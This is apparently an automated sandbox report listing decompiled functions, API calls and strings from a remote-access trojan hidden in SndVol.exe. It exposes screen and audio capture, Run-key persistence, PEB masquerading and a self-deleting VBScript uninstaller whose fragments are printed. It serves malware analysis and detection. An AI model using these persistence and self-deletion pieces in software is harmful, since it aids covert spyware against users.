Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
Instruction Fuzzy Hash:

Function 00418E76 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
CreateCompatibleDC.GDI32(00000000), ref: 00418E9D

Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355

CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
DeleteDC.GDI32(00000000), ref: 00418F2A
DeleteDC.GDI32(00000000), ref: 00418F2D
DeleteObject.GDI32(00000000), ref: 00418F30
SelectObject.GDI32(00000000,00000000), ref: 00418F51
DeleteDC.GDI32(00000000), ref: 00418F62
DeleteDC.GDI32(00000000), ref: 00418F65
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
GetCursorInfo.USER32(?), ref: 00418FA7
GetIconInfo.USER32(?,?), ref: 00418FBD
DeleteObject.GDI32(?), ref: 00418FEC
DeleteObject.GDI32(?), ref: 00418FF9
DrawIcon.USER32(00000000,?,?,?), ref: 00419006
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
DeleteDC.GDI32(?), ref: 0041917C
DeleteDC.GDI32(00000000), ref: 0041917F
DeleteObject.GDI32(00000000), ref: 00419182
GlobalFree.KERNEL32(?), ref: 0041918D
DeleteObject.GDI32(00000000), ref: 00419241
GlobalFree.KERNEL32(?), ref: 00419248
DeleteDC.GDI32(?), ref: 00419258
DeleteDC.GDI32(00000000), ref: 00419263

Strings

DISPLAY, xrefs: 00418E89

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
String ID: DISPLAY
API String ID: 4256916514-865373369
Opcode ID: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
Opcode Fuzzy Hash: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A

Function 0040D420 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
ExitProcess.KERNEL32 ref: 0040D7D0

Strings

fso.DeleteFile ", xrefs: 0040D63A
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D471
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D773
open, xrefs: 0040D7BE
0qF, xrefs: 0040D737, 0040D778, 0040D661, 0040D68E
while fso.FileExists(", xrefs: 0040D5EC
fso.DeleteFolder ", xrefs: 0040D6AB
exepath, xrefs: 0040D4F7
""", 0, xrefs: 0040D6E7
wend, xrefs: 0040D689
On Error Resume Next, xrefs: 0040D5B9
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D4C2
Temp, xrefs: 0040D580
0qF, xrefs: 0040D78C, 0040D797
\update.vbs, xrefs: 0040D57B
"), xrefs: 0040D5D5
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D701
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D5AA

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$0qF$0qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-466687293
Opcode ID: f7d322809b914f19b846363ddb38753919320f4f9bcc977e84cbdb017e4fa96d
Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
Opcode Fuzzy Hash: f7d322809b914f19b846363ddb38753919320f4f9bcc977e84cbdb017e4fa96d
Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E

Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
SetEvent.KERNEL32 ref: 0041B219
WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
CloseHandle.KERNEL32 ref: 0041B23A
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266

Strings

NG, xrefs: 0041B109, 0041B08B
open ", xrefs: 0041B0D0
close audio, xrefs: 0041B261
" type , xrefs: 0041B0D5
play audio, xrefs: 0041B14B
status audio mode, xrefs: 0041B1F7
stop audio, xrefs: 0041B257
alias audio, xrefs: 0041B0B8
pause audio, xrefs: 0041B1CA
resume audio, xrefs: 0041B1E2
stopped, xrefs: 0041B202

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
API String ID: 738084811-2094122233
Opcode ID: 50832f8bf9a84463f1ce31ba7bee2e24b45050ddeed62568717ea9fad8fd07d9
Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
Opcode Fuzzy Hash: 50832f8bf9a84463f1ce31ba7bee2e24b45050ddeed62568717ea9fad8fd07d9
Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E

Function 0040D096 Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
ExitProcess.KERNEL32 ref: 0040D419

Strings

fso.DeleteFile ", xrefs: 0040D315
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D0E7
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D3C1
open, xrefs: 0040D40C
.vbs, xrefs: 0040D201
while fso.FileExists(", xrefs: 0040D2C8
hpF, xrefs: 0040D38F
fso.DeleteFolder ", xrefs: 0040D38A
pth_unenc, xrefs: 0040D09C
exepath, xrefs: 0040D181
wend, xrefs: 0040D364
On Error Resume Next, xrefs: 0040D294
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D138
Temp, xrefs: 0040D246
"), xrefs: 0040D2B1
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D285

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-1898615514
Opcode ID: 7dc79a9c7b7f57b190baedc40edbf326f9f94c0a8f415f8b325b2df22b0f194d
Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
Opcode Fuzzy Hash: 7dc79a9c7b7f57b190baedc40edbf326f9f94c0a8f415f8b325b2df22b0f194d
Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E

Function 00412475 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
ExitProcess.KERNEL32(00000000), ref: 004124A0
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
CloseHandle.KERNEL32(00000000), ref: 0041253B
GetCurrentProcessId.KERNEL32 ref: 00412541
PathFileExistsW.SHLWAPI(?), ref: 00412572
GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
lstrcatW.KERNEL32(?,.exe), ref: 00412601

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
Sleep.KERNEL32(000001F4), ref: 00412682
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
CloseHandle.KERNEL32(00000000), ref: 004126A9
GetCurrentProcessId.KERNEL32 ref: 004126AF

Strings

WDH, xrefs: 00412548, 004126B6
open, xrefs: 0041263B
.exe, xrefs: 004125F5
exepath, xrefs: 004124CC
temp_, xrefs: 004125E3

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
String ID: .exe$WDH$exepath$open$temp_
API String ID: 2649220323-3088914985
Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D

Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7

Strings

data, xrefs: 00401BB1
fmt , xrefs: 00401B2D
RIFF, xrefs: 00401AFD
WAVE, xrefs: 00401B1D

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3

Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\SysWOW64\SndVol.exe,00000001,0040764D,C:\Windows\SysWOW64\SndVol.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
GetProcAddress.KERNEL32(00000000), ref: 0040728D
GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
GetProcAddress.KERNEL32(00000000), ref: 004072A5
GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
GetProcAddress.KERNEL32(00000000), ref: 004072B9
GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
GetProcAddress.KERNEL32(00000000), ref: 004072CD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
GetProcAddress.KERNEL32(00000000), ref: 004072E1
GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
GetProcAddress.KERNEL32(00000000), ref: 004072F5

Strings

RtlAcquirePebLock, xrefs: 004072C4
C:\Windows\SysWOW64\SndVol.exe, xrefs: 00407271
NtAllocateVirtualMemory, xrefs: 0040729C
RtlInitUnicodeString, xrefs: 0040727E
LdrEnumerateLoadedModules, xrefs: 004072EC
ntdll.dll, xrefs: 00407278, 00407283, 004072A1, 004072B5, 004072C9, 004072DD, 004072F1
NtFreeVirtualMemory, xrefs: 004072B0
RtlReleasePebLock, xrefs: 004072D8

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\SysWOW64\SndVol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
API String ID: 1646373207-2877372328
Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D

Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040CE07
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
CopyFileW.KERNEL32(C:\Windows\SysWOW64\SndVol.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
_wcslen.LIBCMT ref: 0040CEE6
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
CopyFileW.KERNEL32(C:\Windows\SysWOW64\SndVol.exe,00000000,00000000), ref: 0040CF84
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
_wcslen.LIBCMT ref: 0040CFC6
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
ExitProcess.KERNEL32 ref: 0040D062

Strings

del, xrefs: 0040CFF5
open, xrefs: 0040D044
C:\Windows\SysWOW64\SndVol.exe, xrefs: 0040CE91, 0040CE96, 0040CEC9, 0040CF7E, 0040CF83, 0040CF8A, 0040CFEB
6, xrefs: 0040CEDA

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$C:\Windows\SysWOW64\SndVol.exe$del$open
API String ID: 1579085052-1404393845
Opcode ID: 37bf41b36f569e96123a73dee1261e03dac0feab31b5a087a033d73400f0ce52
Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
Opcode Fuzzy Hash: 37bf41b36f569e96123a73dee1261e03dac0feab31b5a087a033d73400f0ce52
Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E

Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0041C036
_memcmp.LIBVCRUNTIME ref: 0041C04E
lstrlenW.KERNEL32(?), ref: 0041C067
FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
lstrcmpW.KERNEL32(?,?), ref: 0041C114
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
_wcslen.LIBCMT ref: 0041C13B
FindVolumeClose.KERNEL32(?), ref: 0041C15B
GetLastError.KERNEL32 ref: 0041C173
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
lstrcatW.KERNEL32(?,?), ref: 0041C1B9
lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
GetLastError.KERNEL32 ref: 0041C1D0

Strings

?, xrefs: 0041C0CD

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA

Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F4BF
_free.LIBCMT ref: 0044F4E5
_free.LIBCMT ref: 0044F50E
_free.LIBCMT ref: 0044F546
_free.LIBCMT ref: 0044F577
_free.LIBCMT ref: 0044F5B8
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044F639
_free.LIBCMT ref: 0044F652
_wcschr.LIBVCRUNTIME ref: 0044F68F
_free.LIBCMT ref: 0044F6FB
_free.LIBCMT ref: 0044F721
_free.LIBCMT ref: 0044F74A
_free.LIBCMT ref: 0044F77F
_free.LIBCMT ref: 0044F7B0
_free.LIBCMT ref: 0044F7F1
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F876
_free.LIBCMT ref: 0044F88F

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID:
API String ID: 3899193279-0
Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799

Function 00414D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
LoadLibraryA.KERNEL32(?), ref: 00414E17
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
FreeLibrary.KERNEL32(00000000), ref: 00414E3E
LoadLibraryA.KERNEL32(?), ref: 00414E76
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
FreeLibrary.KERNEL32(00000000), ref: 00414E8F
GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
FreeLibrary.KERNEL32(00000000), ref: 00414EB5

Strings

getnameinfo, xrefs: 00414DA2
freeaddrinfo, xrefs: 00414DB2
\wship6, xrefs: 00414E5E
getaddrinfo, xrefs: 00414D93, 00414E31, 00414E82
\ws2_32, xrefs: 00414DFF

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-744132762
Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
